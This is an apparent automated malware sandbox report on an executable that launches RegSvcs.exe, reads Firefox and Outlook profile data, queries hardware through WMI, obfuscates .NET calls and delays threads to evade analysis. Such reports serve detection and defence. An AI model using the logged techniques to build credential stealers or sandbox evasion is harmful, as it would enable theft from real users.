Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\GkYUK8VCrO.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: GkYUK8VCrO.exe

ReversingLabs: Detection: 42%

Source: unknown	Process created: C:\Users\user\Desktop\GkYUK8VCrO.exe "C:\Users\user\Desktop\GkYUK8VCrO.exe"
Source: C:\Users\user\Desktop\GkYUK8VCrO.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\GkYUK8VCrO.exe"
Source: C:\Users\user\Desktop\GkYUK8VCrO.exe	Process created: C:\Users\user\Desktop\GkYUK8VCrO.exe "C:\Users\user\Desktop\GkYUK8VCrO.exe"
Source: C:\Users\user\Desktop\GkYUK8VCrO.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\GkYUK8VCrO.exe"
Source: C:\Users\user\Desktop\GkYUK8VCrO.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\GkYUK8VCrO.exe"	Jump to behavior
Source: C:\Users\user\Desktop\GkYUK8VCrO.exe	Process created: C:\Users\user\Desktop\GkYUK8VCrO.exe "C:\Users\user\Desktop\GkYUK8VCrO.exe"	Jump to behavior
Source: C:\Users\user\Desktop\GkYUK8VCrO.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\GkYUK8VCrO.exe"	Jump to behavior

Source: C:\Users\user\Desktop\GkYUK8VCrO.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\GkYUK8VCrO.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\GkYUK8VCrO.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\GkYUK8VCrO.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\GkYUK8VCrO.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\GkYUK8VCrO.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\GkYUK8VCrO.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\GkYUK8VCrO.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\GkYUK8VCrO.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\GkYUK8VCrO.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\GkYUK8VCrO.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\GkYUK8VCrO.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\GkYUK8VCrO.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\GkYUK8VCrO.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\GkYUK8VCrO.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\GkYUK8VCrO.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\GkYUK8VCrO.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\GkYUK8VCrO.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\GkYUK8VCrO.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\GkYUK8VCrO.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\GkYUK8VCrO.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\GkYUK8VCrO.exe	Section loaded: wldp.dll	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles

Jump to behavior

Source: GkYUK8VCrO.exe

Static file information: File size 1623552 > 1048576

Source: GkYUK8VCrO.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: GkYUK8VCrO.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: GkYUK8VCrO.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: GkYUK8VCrO.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: GkYUK8VCrO.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: GkYUK8VCrO.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: GkYUK8VCrO.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: _.pdb source: RegSvcs.exe, 00000003.00000002.4153513364.0000000005870000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4150816380.0000000002FBE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: GkYUK8VCrO.exe, 00000000.00000003.1681182332.0000000003BE0000.00000004.00001000.00020000.00000000.sdmp, GkYUK8VCrO.exe, 00000000.00000003.1680747519.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, GkYUK8VCrO.exe, 00000002.00000003.1692054040.0000000003900000.00000004.00001000.00020000.00000000.sdmp, GkYUK8VCrO.exe, 00000002.00000003.1692800812.0000000003760000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: GkYUK8VCrO.exe, 00000000.00000003.1681182332.0000000003BE0000.00000004.00001000.00020000.00000000.sdmp, GkYUK8VCrO.exe, 00000000.00000003.1680747519.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, GkYUK8VCrO.exe, 00000002.00000003.1692054040.0000000003900000.00000004.00001000.00020000.00000000.sdmp, GkYUK8VCrO.exe, 00000002.00000003.1692800812.0000000003760000.00000004.00001000.00020000.00000000.sdmp

Source: GkYUK8VCrO.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: GkYUK8VCrO.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: GkYUK8VCrO.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: GkYUK8VCrO.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: GkYUK8VCrO.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 3.2.RegSvcs.exe.2fffe36.2.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 3.2.RegSvcs.exe.5900000.5.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 3.2.RegSvcs.exe.5870ee8.4.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})

Source: C:\Users\user\Desktop\GkYUK8VCrO.exe

Code function: 0_2_00B1C304 LoadLibraryA,GetProcAddress,

0_2_00B1C304

Source: C:\Users\user\Desktop\GkYUK8VCrO.exe	Code function: 0_2_00B08719 push FFFFFF8Bh; iretd	0_2_00B0871B
Source: C:\Users\user\Desktop\GkYUK8VCrO.exe	Code function: 0_2_00ACE94F push edi; ret	0_2_00ACE951
Source: C:\Users\user\Desktop\GkYUK8VCrO.exe	Code function: 0_2_00ACEA68 push esi; ret	0_2_00ACEA6A
Source: C:\Users\user\Desktop\GkYUK8VCrO.exe	Code function: 0_2_00AC8B85 push ecx; ret	0_2_00AC8B98
Source: C:\Users\user\Desktop\GkYUK8VCrO.exe	Code function: 0_2_00ACEC43 push esi; ret	0_2_00ACEC45
Source: C:\Users\user\Desktop\GkYUK8VCrO.exe	Code function: 0_2_00ACED2C push edi; ret	0_2_00ACED2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0041C40C push cs; iretd	3_2_0041C4E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00423149 push eax; ret	3_2_00423179
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0041C50E push cs; iretd	3_2_0041C4E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_004231C8 push eax; ret	3_2_00423179
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0040E21D push ecx; ret	3_2_0040E230
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0041C6BE push ebx; ret	3_2_0041C6BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0040BB97 push dword ptr [ecx-75h]; iretd	3_2_0040BBA3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_02F64B95 push ds; iretd	3_2_02F64B9B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_02F6475C push ebx; retf	3_2_02F64762
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_06D126A7 push cs; iretd	3_2_06D126AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_06D1D39A push esp; ret	3_2_06D1D3A1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_06E5EF35 push dword ptr [ecx+ecx-75h]; iretd	3_2_06E5EF3B

Source: 3.2.RegSvcs.exe.2fffe36.2.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'CCk2q9xfqmQhH', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 3.2.RegSvcs.exe.5900000.5.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'CCk2q9xfqmQhH', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 3.2.RegSvcs.exe.5870ee8.4.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'CCk2q9xfqmQhH', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'

Source: C:\Users\user\Desktop\GkYUK8VCrO.exe	Code function: 0_2_00AA4A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_00AA4A35
Source: C:\Users\user\Desktop\GkYUK8VCrO.exe	Code function: 0_2_00B255FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_00B255FD

Source: C:\Users\user\Desktop\GkYUK8VCrO.exe

Code function: 0_2_00AC33C7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00AC33C7

Source: C:\Users\user\Desktop\GkYUK8VCrO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GkYUK8VCrO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GkYUK8VCrO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\GkYUK8VCrO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\GkYUK8VCrO.exe	API/Special instruction interceptor: Address: A43234
Source: C:\Users\user\Desktop\GkYUK8VCrO.exe	API/Special instruction interceptor: Address: 1A63234

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 3_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,

3_2_004019F0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 1200000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 1199891	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 1199781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 1199672	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 1199563	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 1199438	Jump to behavior
